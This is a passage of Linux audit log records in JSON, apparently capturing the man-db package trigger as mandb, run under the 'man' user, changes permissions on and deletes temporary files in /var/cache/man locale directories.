"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/es"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/es/",
"inode": 266942,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/es/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:759",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a4b10",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/es"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/cs/CACHEDIR.TAG",
"inode": 276958,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:760",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/es"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/cs/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:761",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/cs"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/cs/",
"inode": 266939,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/cs/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:762",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f997fb0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/cs"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/pl/CACHEDIR.TAG",
"inode": 276959,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:763",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/cs"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/pl/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:764",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/pl"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/pl/",
"inode": 266951,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/pl/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:765",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f978480",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/pl"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/nl/CACHEDIR.TAG",
"inode": 276960,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:766",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/pl"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/nl/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:767",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/nl"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/nl/",
"inode": 266950,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/nl/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:768",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f976d40",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/nl"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/zh_TW/CACHEDIR.TAG",
"inode": 276961,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:769",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f976d40",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/nl"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/zh_TW/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:770",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f976d40",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/zh_TW"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/zh_TW/",
"inode": 266960,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/zh_TW/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:771",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f963790",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/zh_TW"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/zh_CN/CACHEDIR.TAG",
"inode": 276962,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:772",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9ae8e0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/zh_TW"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/zh_CN/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:773",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9ae8e0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/zh_CN"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/zh_CN/",
"inode": 266959,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/zh_CN/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:774",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9905a0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/zh_CN"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/ko/CACHEDIR.TAG",
"inode": 276963,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:775",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f912da0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/zh_CN"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/ko/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:776",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f912da0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/ko"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/ko/",
"inode": 266949,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/ko/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.433:777",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f990570",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/ko"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/ru/CACHEDIR.TAG",
"inode": 276964,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
